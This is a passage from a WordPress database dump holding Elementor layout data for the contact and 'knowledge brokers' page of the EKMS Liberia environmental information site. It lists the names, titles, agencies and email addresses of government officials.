\\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23543,3426,'_wp_attached_file','2021/01/bgoll.jpg'),(23544,3426,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:652;s:4:\"file\";s:17:\"2021/01/bgoll.jpg\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"bgoll-300x279.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:279;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"bgoll-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23545,3427,'_elementor_edit_mode','builder'),(23546,3427,'_elementor_template_type','wp-page'),(23547,3427,'_elementor_version','3.0.16'),(23548,3427,'_wp_page_template','default'),(23549,3427,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll<\\/strong><br \\/>Conservation Manager<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Director <br \\/>MOA <br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a 